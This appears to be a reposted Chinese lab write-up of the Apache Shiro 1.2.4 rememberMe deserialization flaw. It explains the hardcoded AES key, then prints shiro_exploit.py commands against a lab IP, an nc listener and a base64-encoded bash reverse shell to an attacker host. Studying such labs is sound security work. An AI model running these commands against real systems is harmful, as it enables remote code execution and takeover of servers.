栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 软件开发 > 后端开发 > Python

Apache Shiro 反序列化漏洞靶场

Python 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力

Apache Shiro 反序列化漏洞靶场

1.漏洞描述

Apache Shiro是一款开源安全框架,提供身份验证、授权、密码学和会话管理。Shiro框架直观、易用,同时也能提供健壮的安全性。

Apache Shiro 1.2.4及以前版本中,加密的用户信息序列化后存储在名为remember-me的cookie中。攻击者可以使用Shiro的默认密钥伪造用户cookie,触发Java反序列化漏洞,进而在目标机器上执行任意命令。

2.漏洞简单分析

Shiro提供了一种下次访问时无需再登录就可访问的功能,即“记住我”功能。Shiro对rememberMe的字段做了加密处理,在cookieRememberMeManaer类中将cookie的字段依次进行序列化->AES加密->base64编码。当需要识别用户身份时,会对cookie中rememberMe字段进行解密,其顺序依次为base64解码->解密AES->反序列化。

在这个过程中,我们发现AES密钥非常关键,但很不幸,密钥被硬编码到了代码中,也就意味着使用shiro组件的业务,其默认的AES密钥都是一样的。因此,攻击者可以构造一个恶意对象,并且进行序列化->AES加密->base64编码后,作为cookie中rememberMe字段进行发送,Shiro将收到的rememberMe字段进行解码、AES解密、反序列化后,最终执行了一个恶意代码,造成反序列化漏洞。

3.漏洞验证

3.1 使用shiro_exploit.py进行利用,尝试写入文件jason123.txt

python shiro_exploit.py -t 3 -u http://192.168.233.134:8080 -p "touch jason123.txt"

3.2 登陆到目标靶机,发现文件成功写入,说明漏洞存在。

4.深度利用

4.1 尝试深度利用,在kali服务器上使用nc监听6666端口

nc -lvp 6666

4.2 使用base64编码进行加密,保证命令成功执行,防止参数被类破坏。

https://jackson-t.ca/runtime-exec-payloads.html

4.3 使用exp执行反弹shell

python shiro_exploit.py -t 3 -u http://192.168.233.134:8080 -p "bash -c {echo,"YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIzMy4xMzEvNjY2NiAwPiYx"}|{base64,-d}|{bash,-i}"

4.4 成功获取shell,反弹成功

免责声明

严禁读者利用以上介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合 !

 

转载请注明:文章转载自 www.mshxw.com
本文地址:https://www.mshxw.com/it/726032.html
我们一直用心在做
关于我们 文章归档 网站地图 联系我们

版权所有 (c)2021-2022 MSHXW.COM

ICP备案号:晋ICP备2021003244-6号